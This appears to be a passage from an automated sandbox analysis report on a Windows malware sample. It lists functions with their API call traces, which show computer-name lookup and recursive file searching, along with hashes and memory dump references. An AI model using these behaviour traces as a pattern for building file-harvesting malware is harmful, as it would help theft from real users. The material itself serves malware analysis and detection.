                                    • Instruction Fuzzy Hash: 7AE09A3090434EFBCB10EBB4CDA8DAB7B78EF04340B00152DA600D7282DB249A04CB19
                                    Function 008E2A70 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2470 8e2a70-8e2ac2 GetProcessHeap RtlAllocateHeap GetComputerNameA 2471 8e2ae4-8e2af9 2470->2471 2472 8e2ac4-8e2ad6 2470->2472
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 008E2A9F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E2AA6
                                    • GetComputerNameA.KERNEL32(00000000,00000104), ref: 008E2ABA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: 2b281b8cc5efc6503161714c6de6f58c89301adcda9aae091ed4e68763f41f87
                                    • Instruction ID: f8f2d5a4ddf703dd8053c831b048581660b53bf737018a78bc5bc7de3a96bffe
                                    • Opcode Fuzzy Hash: 2b281b8cc5efc6503161714c6de6f58c89301adcda9aae091ed4e68763f41f87
                                    • Instruction Fuzzy Hash: 1001D172A44658ABD710CFD9EC45BAAFBBCF744B21F00026AFA19D3780DB741904C6A1

                                    Non-executed Functions

                                    Function 008D2730 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D2774
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2797
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D27A2
                                    • lstrlen.KERNEL32(\*.*), ref: 008D27AD
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D27CA
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 008D27D6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D280A
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 008D2826
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2567437900-1173974218
                                    • Opcode ID: 4c99977fccaeff6898c3b9919e117ace11977d50803287e70a556015bf0a8a74
                                    • Instruction ID: 542de409ddc2affffb31a5519bba1a4dc55be326d1b152115eada2df02bbb3cf
                                    • Opcode Fuzzy Hash: 4c99977fccaeff6898c3b9919e117ace11977d50803287e70a556015bf0a8a74
                                    • Instruction Fuzzy Hash: AFA208719016169BCB21AFB8DC89F6E7BB9FF44700F044629A805E7361DB34DD06CB92
                                    Function 008C15A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C15E2
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C1619
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C166C
                                    • lstrcat.KERNEL32(00000000), ref: 008C1676
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C16A2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C16EF
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C16F9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1725
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1775
                                    • lstrcat.KERNEL32(00000000), ref: 008C177F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C17AB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C17F3
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C17FE
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1809
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1829
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1835
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C185B
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1866
                                    • lstrlen.KERNEL32(\*.*), ref: 008C1871
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C188E
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 008C189A
                                      • Part of subcall function 008E4020: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 008E404D
                                      • Part of subcall function 008E4020: lstrcpy.KERNEL32(00000000,?), ref: 008E4082
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C18C3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C190E
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1916
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1921
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1941
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C194D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1976
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1981
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C198C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C19AC
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C19B8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C19DE
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C19E9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1A11
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 008C1A45
                                    • StrCmpCA.SHLWAPI(?,008F1D68), ref: 008C1A70
                                    • StrCmpCA.SHLWAPI(?,008F1D6C), ref: 008C1A8A
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C1AC4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1AFB
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1B03
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1B0E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1B31
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1B3D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1B69
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1B74
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1B7F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1BA2
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1BAE
                                    • lstrlen.KERNEL32(?), ref: 008C1BBB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1BDB
                                    • lstrcat.KERNEL32(00000000,?), ref: 008C1BE9
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1BF4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1C14
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1C20
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1C46
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1C51
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1C7D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1CE0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1CEB
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1CF6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1D19
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1D25
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1D4B
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1D56
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1D61
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1D81
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1D8D
                                    • lstrlen.KERNEL32(?), ref: 008C1D9A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1DBA
                                    • lstrcat.KERNEL32(00000000,?), ref: 008C1DC8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1DF4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1E3E
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 008C1E45
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C1E9F
                                    • lstrlen.KERNEL32(00538F88), ref: 008C1EAE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1EDB
                                    • lstrcat.KERNEL32(00000000,?), ref: 008C1EE3
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1EEE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1F0E
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1F1A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1F42
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1F4D
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1F58
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1F75
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1F81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                    • String ID: \*.*
                                    • API String ID: 4127656590-1173974218
                                    • Opcode ID: 03bee48ea9c96f243d7d439b845d3d2fa3e4223248d47aa18fd006978f398cf2
                                    • Instruction ID: bd5f0607a8bdee5a097b21a7cb5921ab4a256cddaa8b1b794e64708d8e2561d2
                                    • Opcode Fuzzy Hash: 03bee48ea9c96f243d7d439b845d3d2fa3e4223248d47aa18fd006978f398cf2
                                    • Instruction Fuzzy Hash: 7992FB7190161A9BCB21EFA8D989FAF7BB9FF45700F044128B905E7252DB34DD06CBA1
                                    Function 008D1C40 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D1C72
                                    • lstrlen.KERNEL32(\*.*), ref: 008D1C7D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1C9F
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 008D1CAB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1CD2
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 008D1CE7
                                    • StrCmpCA.SHLWAPI(?,008F1D68), ref: 008D1D07
                                    • StrCmpCA.SHLWAPI(?,008F1D6C), ref: 008D1D21
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D1D5F
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D1D92
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1DBA
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D1DC5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1DEC
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D1DFE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1E20
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D1E2C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1E54
                                    • lstrlen.KERNEL32(?), ref: 008D1E68
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1E85
                                    • lstrcat.KERNEL32(00000000,?), ref: 008D1E93
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1EB9
                                    • lstrlen.KERNEL32(00538F38), ref: 008D1ECF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1EF9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D1F04
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1F2F
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D1F41
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1F63
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D1F6F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1F98
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1FC5
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D1FD0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1FF7
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D2009
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D202B
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D2037
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2060
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D208F
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D209A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D20C1
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D20D3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D20F5
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D2101
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D212A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2159
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D2164
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D218D
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D21B9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D21D6
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D21E2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2208
                                    • lstrlen.KERNEL32(0053D0A0), ref: 008D221E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2252
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D2266
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2283
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D228F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D22B5
                                    • lstrlen.KERNEL32(0053D770), ref: 008D22CB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D22FF
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D2313
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2330
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D233C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2362
                                    • lstrlen.KERNEL32(0052B838), ref: 008D2378
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D23A0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D23AB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D23D6
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D23E8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2407
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D2413
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2438
                                    • lstrlen.KERNEL32(?), ref: 008D244C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2470
                                    • lstrcat.KERNEL32(00000000,?), ref: 008D247E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D24A3
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D24DF
                                    • lstrlen.KERNEL32(0053D118), ref: 008D24EE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2516
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D2521
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                    • String ID: \*.*
                                    • API String ID: 712834838-1173974218
                                    • Opcode ID: 6b3c1547f4f3dfe93bcf6e421a91fa29f5706fe14904deffe7fbc953ce1a241d
                                    • Instruction ID: 87d2bad28797d6fe360cfafb93bc1b5fc6c2cbcb7ec28eefcf92423ad4b80bdc
                                    • Opcode Fuzzy Hash: 6b3c1547f4f3dfe93bcf6e421a91fa29f5706fe14904deffe7fbc953ce1a241d
                                    • Instruction Fuzzy Hash: 0F62F831911616ABCB21EBA8DC49FAF7BB9FF44700F044229A815D63A1DF34DD16CBA1
                                    Function 008D3CC0 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 008D3CDC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 008D3CF3
                                    • StrCmpCA.SHLWAPI(?,008F1D68), ref: 008D3D1C
                                    • StrCmpCA.SHLWAPI(?,008F1D6C), ref: 008D3D36
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D3D6F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D3D97
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D3DA2
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D3DAD
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D3DCA
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D3DD6
                                    • lstrlen.KERNEL32(?), ref: 008D3DE3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D3E03
                                    • lstrcat.KERNEL32(00000000,?), ref: 008D3E11
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D3E3A
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D3E7E
                                    • lstrlen.KERNEL32(?), ref: 008D3E88
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D3EB5
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D3EC0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D3EE6
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D3EF8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D3F1A
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D3F26
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D3F4E
                                    • lstrlen.KERNEL32(?), ref: 008D3F62
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D3F82
                                    • lstrcat.KERNEL32(00000000,?), ref: 008D3F90
                                    • lstrlen.KERNEL32(00538F88), ref: 008D3FBB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D3FE1
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D3FEC
                                    • lstrlen.KERNEL32(00538F38), ref: 008D400E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4034
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D403F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4067
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D4079
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4098
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D40A4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D40CA
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D40F7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D4102
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4129
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D413B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D415D
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D4169
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4192
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D41C1
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D41CC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D41F3
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D4205
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4227
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D4233
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D425C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D428B
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D4296
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D42BD
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D42CF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D42F1
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D42FD
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4325
                                    • lstrlen.KERNEL32(?), ref: 008D4339
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4359
                                    • lstrcat.KERNEL32(00000000,?), ref: 008D4367
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4390
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D43CF
                                    • lstrlen.KERNEL32(0053D118), ref: 008D43DE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4406
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D4411
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D443A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D447E
                                    • lstrcat.KERNEL32(00000000), ref: 008D448B
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 008D4689
                                    • FindClose.KERNEL32(00000000), ref: 008D4698
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
